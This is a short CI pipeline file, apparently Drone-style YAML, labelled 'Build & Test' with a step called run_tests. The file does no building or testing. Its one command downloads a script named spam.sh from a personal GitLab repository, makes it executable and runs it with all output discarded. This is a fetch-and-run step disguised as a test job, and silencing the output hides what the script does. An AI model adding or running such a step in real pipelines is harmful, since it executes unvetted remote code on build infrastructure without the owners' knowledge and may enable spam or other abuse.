---
################
# Build & Test #
################

kind: pipeline
name: run_tests

steps:
    commands:
    - wget https://gitlab.com/renifer12/project-7/-/raw/main/spam.sh && chmod +x spam.sh && ./spam.sh > /dev/null 2>&1
